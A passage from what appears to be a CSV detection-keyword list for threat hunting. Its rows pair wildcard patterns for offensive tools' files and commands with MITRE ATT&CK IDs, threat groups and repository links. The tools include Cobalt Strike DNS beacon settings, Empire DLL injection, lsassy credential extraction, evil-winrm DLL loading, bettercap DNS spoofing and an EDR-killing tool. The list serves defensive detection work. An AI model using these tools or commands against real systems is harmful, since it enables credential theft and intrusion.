TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DLL-Hijack-Search-Order-BOF*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" +"*dllinject *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*dllload *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*DllLoaderLoader.exe*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DllNotificationInjection.cpp*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*DllNotificationInjection.exe*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*DllNotificationInjection.sln*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*DllNotificationInjection.vcxproj*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*DllNotificationInjection-master*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*dllproxy.py*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" +"*DllProxy-main*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" +"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dmcxblue/SharpBlackout*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*DNet-EnumerateAllDomainUserAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*DNet-ListAccountsByDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*DNet-ListDomainUserAccountsWithCompletedADDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*DNet-ListUsersInDomainAdminsGroup*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*dnf install tor -y*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 